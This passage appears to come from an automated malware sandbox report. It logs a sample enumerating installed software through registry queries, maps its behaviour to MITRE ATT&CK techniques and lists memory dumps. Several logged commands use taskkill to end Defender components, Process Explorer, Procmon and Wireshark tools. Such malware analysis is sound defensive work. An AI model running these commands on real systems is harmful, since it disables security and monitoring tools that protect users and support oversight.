    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:380
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:2420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:856
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2132
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:1056
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:2436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    PID:2232
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:2500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:2304
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:2328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    PID:2272
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:1464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:2640
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:2712
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:2652
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:2672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:2484
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:2032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:2068
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:1868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:340
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1308
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:2784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:2764
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:2768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:2812
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:2816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    PID:2912
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:2524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    PID:2808
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:2928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:2976
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:3012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:2076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:2200
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2196
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:2292
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:2564
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2836
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2348
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2540
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2988
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1012
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2416
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2136
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3024

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1412-152-0x0000000002710000-0x0000000002711000-memory.dmp

Filesize
4KB

Download
memory/1412-129-0x00000000028C0000-0x00000000028C1000-memory.dmp

Filesize
4KB

Download
memory/1412-82-0x00000000023C0000-0x00000000023C1000-memory.dmp

Filesize
4KB

Download
memory/1412-150-0x0000000002700000-0x0000000002701000-memory.dmp

Filesize
4KB

Download
memory/1412-124-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/1412-72-0x000000001ACC0000-0x000000001ACC1000-memory.dmp

Filesize
4KB

Download
memory/1412-71-0x00000000022F0000-0x00000000022F1000-memory.dmp

Filesize
4KB

Download
memory/1412-95-0x0000000002480000-0x0000000002481000-memory.dmp

Filesize
4KB

Download
memory/1412-34-0x000007FEF5F10000-0x000007FEF68FC000-memory.dmp

Filesize
9.9MB

Download